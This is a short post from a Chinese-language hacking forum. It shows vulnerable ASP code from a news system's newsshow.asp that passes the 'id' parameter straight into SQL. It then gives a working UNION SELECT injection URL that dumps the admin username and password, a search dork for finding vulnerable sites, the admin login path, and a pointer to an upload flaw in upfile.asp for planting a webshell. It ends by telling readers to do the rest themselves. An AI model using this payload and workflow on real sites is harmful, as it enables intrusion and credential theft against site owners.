    
- 帖子
- 3852
- 积分
- 13044
- 威望
- 16780
- 金钱
- 36761
- 在线时间
- 1139 小时
         
|
程序代码- 核心提示:漏洞文件:newsshow.asp漏洞代码:% set rs=server.createobject('adodb.recordset')sql='update news set hit=hit+1 where ID='request('id')rs.open sql,conn,1,3%% set ...
复制代码 漏洞文件:newsshow.asp
漏洞代码:
程序代码- <%
- set rs=server.createobject("adodb.recordset")
- sql="update news set hit=hit+1 where ID="&request("id")
- rs.open sql,conn,1,3
- %>
- <%
- set rs=server.CreateObject("adodb.recordset")
- sql="select * from news where ID="&request("id")
- rs.open sql,conn
- %>
复制代码 只分析了这一个,
任意上传漏洞:upfile.asp
有兴趣的可以分析下利用上传拿WEBSHELL
搜索关键词:inurl:baodianlist.asp+信息中心
然后输入- http://127.0.0.1/newsshow.asp?id=50%20union%20select%201,username,password,4,5,6%20from%20admin
复制代码 爆出管理帐号密码
后台登陆地址:admin.asp
剩下的自己搞吧! |
|